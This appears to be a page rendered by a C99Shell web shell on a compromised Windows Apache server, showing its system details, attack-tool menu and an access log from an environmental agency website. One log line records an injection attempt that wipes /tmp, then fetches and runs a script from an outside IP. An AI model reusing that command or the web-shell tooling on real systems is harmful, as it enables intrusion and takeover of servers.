!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.33 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.07.07.log (4.57 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
66.249.70.198 - - [07/Jul/2023:00:00:46 -0500] "-" 408 -
69.171.249.6 - - [07/Jul/2023:00:00:54 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_id=Julio_2023 HTTP/1.1" 206 783
190.84.47.215 - - [07/Jul/2023:00:01:06 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&fbclid=IwAR3l_APUM9d7WbKwBuP6OYFXwRvus9v03KEpqBaBjGQmQhg5aFICULYY-ik_aem_AZZE9AFHutMUXy-mhnfoCS6O8TgANY7R5StzKPaJTl4qRZQs9ZZdyouIY-EXGkLNYJZg59tHzsNyGU4Vfa-v-5LH HTTP/1.1" 200 783
34.91.183.172 - - [07/Jul/2023:00:01:50 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
172.22.2.4 - - [07/Jul/2023:00:01:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.128 - - [07/Jul/2023:00:03:42 -0500] "-" 408 -
172.22.2.4 - - [07/Jul/2023:00:02:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
173.252.107.9 - - [07/Jul/2023:00:04:00 -0500] "GET /dale-una-nueva-oportunidad-a-tu-ropa-usada-se-trasladan-dos-puntos-para-llevarla.html HTTP/1.1" 200 913
216.245.221.92 - - [07/Jul/2023:00:04:05 -0500] "HEAD / HTTP/1.1" 200 -
144.91.106.14 - - [07/Jul/2023:00:04:10 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [07/Jul/2023:00:04:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
191.95.50.191 - - [07/Jul/2023:00:07:25 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023 HTTP/1.1" 200 783
172.22.2.4 - - [07/Jul/2023:00:07:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [07/Jul/2023:00:09:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:00:09:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:00:07:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
172.22.2.4 - - [07/Jul/2023:00:10:31 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [07/Jul/2023:00:10:55 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:11:07 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2010&resuelve= HTTP/1.1" 200 999
172.22.2.4 - - [07/Jul/2023:00:11:15 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2009&resuelve= HTTP/1.1" 200 1029
172.22.2.4 - - [07/Jul/2023:00:11:22 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2009&resuelve= HTTP/1.1" 200 1029
172.22.2.4 - - [07/Jul/2023:00:11:23 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2009&resuelve= HTTP/1.1" 200 1029
172.22.2.4 - - [07/Jul/2023:00:11:28 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2008&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:11:32 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2007&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:11:33 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2007&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:12:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1776&usuario=&sector=AIRE&fecha=2019&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:12:11 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1776&usuario=&sector=AIRE&fecha=2019&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:12:19 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [07/Jul/2023:00:12:48 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2767&usuario=&sector=&fecha=2009&resuelve= HTTP/1.1" 200 1078
181.54.168.101 - - [07/Jul/2023:00:12:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2767.pdf HTTP/1.1" 200 408439
172.22.2.4 - - [07/Jul/2023:00:14:01 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2347&usuario=&sector=&fecha=2014&resuelve= HTTP/1.1" 200 1105
181.54.168.101 - - [07/Jul/2023:00:14:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2347.pdf HTTP/1.1" 200 287084
216.245.221.92 - - [07/Jul/2023:00:14:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:00:14:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
152.61.192.232 - - [07/Jul/2023:00:14:17 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [07/Jul/2023:00:12:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:00:13:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
172.22.2.4 - - [07/Jul/2023:00:15:39 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2457&usuario=&sector=&fecha=2014&resuelve= HTTP/1.1" 200 1105
172.22.2.4 - - [07/Jul/2023:00:15:42 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2457&usuario=&sector=&fecha=2014&resuelve= HTTP/1.1" 200 1105
181.54.168.101 - - [07/Jul/2023:00:15:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2457.pdf HTTP/1.1" 200 281112
172.22.2.4 - - [07/Jul/2023:00:16:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1401&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1103
181.54.168.101 - - [07/Jul/2023:00:16:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1401.pdf HTTP/1.1" 200 474364
172.22.2.4 - - [07/Jul/2023:00:17:51 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1776&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 1377
181.54.168.101 - - [07/Jul/2023:00:17:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1776.pdf HTTP/1.1" 200 584363
181.59.3.47 - - [07/Jul/2023:00:17:55 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&fbclid=IwAR3jknfKt8y2lo6mvtGdRPfD9lanuR-sRpAfyPzjDL4qvePcRYawgHFXYWc_aem_AZa4D3fLtdw61Z4nItNeta-bg72zYqxjmuaa10tgGIEHU32fJnLA0q_IZjiHk0xSs72l1YOMViEBOjfOoWUOuym8 HTTP/1.1" 200 783
69.171.249.3 - - [07/Jul/2023:00:17:57 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023 HTTP/1.1" 206 783
69.171.249.3 - - [07/Jul/2023:00:17:57 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023 HTTP/1.1" 206 783
69.171.249.9 - - [07/Jul/2023:00:17:57 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_id=Julio_2023 HTTP/1.1" 206 783
69.171.249.9 - - [07/Jul/2023:00:17:58 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_id=Julio_2023 HTTP/1.1" 206 783
69.171.249.120 - - [07/Jul/2023:00:17:58 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_id=Julio_2023 HTTP/1.1" 206 783
69.171.249.119 - - [07/Jul/2023:00:17:58 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_id=Julio_2023 HTTP/1.1" 206 783
172.22.2.4 - - [07/Jul/2023:00:18:46 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:18:57 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
216.245.221.92 - - [07/Jul/2023:00:19:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:00:19:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:00:19:21 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2011&resuelve=ULTRADIFUSION HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:19:22 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2011&resuelve=ULTRADIFUSION HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:19:24 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [07/Jul/2023:00:19:49 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
201.245.192.253 - - [07/Jul/2023:00:19:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39648
201.245.192.253 - - [07/Jul/2023:00:19:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:00:20:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2010&resuelve= HTTP/1.1" 200 999
172.22.2.4 - - [07/Jul/2023:00:18:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:00:20:26 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2009&resuelve= HTTP/1.1" 200 1029
172.22.2.4 - - [07/Jul/2023:00:20:33 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2008&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:20:38 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2012&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:20:43 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2006&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:20:46 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2007&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:20:48 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=6088&usuario=&sector=&fecha=2008&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [07/Jul/2023:00:19:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
216.245.221.92 - - [07/Jul/2023:00:24:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:00:24:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:00:23:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58079
172.22.2.4 - - [07/Jul/2023:00:24:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
35.204.165.106 - - [07/Jul/2023:00:26:53 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
172.22.2.4 - - [07/Jul/2023:00:25:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
216.245.221.92 - - [07/Jul/2023:00:29:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:00:29:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
191.95.48.193 - - [07/Jul/2023:00:29:41 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&fbclid=IwAR0GrMdU5QWc3jyq82Z7P2nX6n2BKoTTslp6hMCTXRgk5V2f1mlhPlxHXzc HTTP/1.1" 200 783
201.245.192.253 - - [07/Jul/2023:00:29:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39648
201.245.192.253 - - [07/Jul/2023:00:29:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
173.252.111.7 - - [07/Jul/2023:00:30:23 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
152.61.128.50 - - [07/Jul/2023:00:31:16 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [07/Jul/2023:00:30:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:00:31:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58825
216.245.221.92 - - [07/Jul/2023:00:34:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:00:34:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:00:36:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
179.19.184.253 - - [07/Jul/2023:00:38:30 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&fbclid=IwAR2qY9TbH3lBAKgDo0TlqM4lnihvg6dHfYmZnwRi68hvKpWlMhO2t-Cplsw_aem_AZb9IpQPNrQt5jFwaHmZxvIJiEkkuXMup_apfY9-4BpVJADLbpx0Bpz0gau_Xpz3ZPFjw2kAUS5akvoSZEjPrCmM HTTP/1.1" 200 783
172.22.2.4 - - [07/Jul/2023:00:37:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
157.55.39.212 - - [07/Jul/2023:00:38:48 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/Pieza-concurso-corresponsal-ambiental-16-mayo-1024x576.jpg HTTP/1.1" 200 78966
216.245.221.92 - - [07/Jul/2023:00:39:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:00:39:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [07/Jul/2023:00:39:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39648
201.245.192.253 - - [07/Jul/2023:00:39:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
66.249.66.163 - - [07/Jul/2023:00:41:04 -0500] "-" 408 -
186.155.33.169 - - [07/Jul/2023:00:42:17 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&fbclid=IwAR0tSPDheAVaGHixJaP8kRRU73fNZrgmLOw_KQmVacTIv-L8nmIoo92hMss_aem_AZbgRdRY8tc1Fl7nxLsbn7R86cYaUvNl884gNvKajModpuQx-SYtwWeUvquCsrWIMw9AgjbBTSa7Lqc2NwxgubrN HTTP/1.1" 200 783
207.46.13.206 - - [07/Jul/2023:00:43:03 -0500] "GET /portaldeninos/publicidad/ HTTP/1.1" 200 87569
172.22.2.4 - - [07/Jul/2023:00:42:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [07/Jul/2023:00:44:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:00:44:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:00:42:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
52.167.144.38 - - [07/Jul/2023:00:45:20 -0500] "GET /Residuos/vehiculos/files/guia_lavado-vehic.pdf HTTP/1.1" 304 -
172.22.2.4 - - [07/Jul/2023:00:45:33 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [07/Jul/2023:00:45:47 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0494&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1126
172.22.2.4 - - [07/Jul/2023:00:45:48 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0494&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1126
181.54.168.101 - - [07/Jul/2023:00:45:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0494.pdf HTTP/1.1" 200 483316
69.171.249.2 - - [07/Jul/2023:00:46:03 -0500] "GET /images/camara-trampa.jpeg HTTP/1.1" 200 77809
69.171.249.7 - - [07/Jul/2023:00:46:03 -0500] "GET /images/stand-secretaria-ambiente-fima.jpg HTTP/1.1" 200 42537
69.171.249.9 - - [07/Jul/2023:00:46:03 -0500] "GET /images/serpiente-sabanera.jpeg HTTP/1.1" 200 167272
69.171.249.120 - - [07/Jul/2023:00:46:12 -0500] "GET /images/manos-reparadoras-plaza-americas-1.jpg HTTP/1.1" 200 47593
66.249.70.198 - - [07/Jul/2023:00:46:49 -0500] "-" 408 -
200.118.80.30 - - [07/Jul/2023:00:47:16 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&fbclid=IwAR05pPIIychNw9-etJMh1Gj1IRtjz5iLx8cMbFD2AVnhj7Za-CwV_VrsRPg_aem_AZZuVv7KXaJ3gelQ_d-nhFRxomJt2ldrEMjl_3rFU-KYwuOdPG5C8x1IDgayeuuP98lhBADggBHUXZ0N5qbUzfLT HTTP/1.1" 200 783
152.61.192.232 - - [07/Jul/2023:00:48:55 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [07/Jul/2023:00:48:56 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [07/Jul/2023:00:48:57 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [07/Jul/2023:00:49:04 -0500] "HEAD / HTTP/1.1" 200 -
18.136.50.255 - - [07/Jul/2023:00:49:06 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20canales%20virtuales.jpg HTTP/1.1" 200 209438
201.245.192.253 - - [07/Jul/2023:00:49:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:00:47:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:00:48:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57680
216.245.221.92 - - [07/Jul/2023:00:54:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:00:54:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:00:53:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:00:54:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58474
172.22.2.4 - - [07/Jul/2023:00:56:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
181.59.3.154 - - [07/Jul/2023:00:58:59 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023 HTTP/1.1" 200 783
216.245.221.92 - - [07/Jul/2023:00:59:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:00:59:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
40.77.167.161 - - [07/Jul/2023:01:00:14 -0500] "GET /Publicaciones/2023EE113997.pdf HTTP/1.1" 404 228
173.252.107.116 - - [07/Jul/2023:01:00:20 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_id=Julio_2023 HTTP/1.1" 206 783
200.118.60.119 - - [07/Jul/2023:01:00:44 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 12235
200.118.60.119 - - [07/Jul/2023:01:00:44 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 460735
172.22.2.4 - - [07/Jul/2023:00:59:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:01:00:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55739
52.167.144.38 - - [07/Jul/2023:01:03:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/3920.pdf HTTP/1.1" 304 -
216.245.221.92 - - [07/Jul/2023:01:04:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:01:04:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:01:05:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:01:06:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
201.245.192.253 - - [07/Jul/2023:01:09:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:01:09:04 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.211 - - [07/Jul/2023:01:10:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0098.pdf HTTP/1.1" 200 326425
172.22.2.4 - - [07/Jul/2023:01:11:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:01:12:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
201.245.192.253 - - [07/Jul/2023:01:13:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:01:14:04 -0500] "HEAD / HTTP/1.1" 200 -
41.42.227.210 - - [07/Jul/2023:01:16:07 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+91.234.99.110/jaws-rep.sh;chmod+777+/tmp/jaws-rep.sh;sh+/tmp/jaws-rep.sh HTTP/1.1" 404 1013
152.61.128.50 - - [07/Jul/2023:01:17:46 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [07/Jul/2023:01:17:47 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [07/Jul/2023:01:17:47 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
34.218.208.164 - - [07/Jul/2023:01:18:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:01:17:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:01:18:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:01:19:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:01:17:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51193
201.245.192.253 - - [07/Jul/2023:01:19:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39494
201.245.192.253 - - [07/Jul/2023:01:19:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
66.249.66.77 - - [07/Jul/2023:01:21:46 -0500] "-" 408 -
201.244.96.113 - - [07/Jul/2023:01:22:29 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.244.96.113 - - [07/Jul/2023:01:22:29 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.244.96.113 - - [07/Jul/2023:01:22:29 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.244.96.113 - - [07/Jul/2023:01:22:30 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
201.244.96.113 - - [07/Jul/2023:01:22:30 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
201.244.96.113 - - [07/Jul/2023:01:22:30 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
201.244.96.113 - - [07/Jul/2023:01:22:30 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
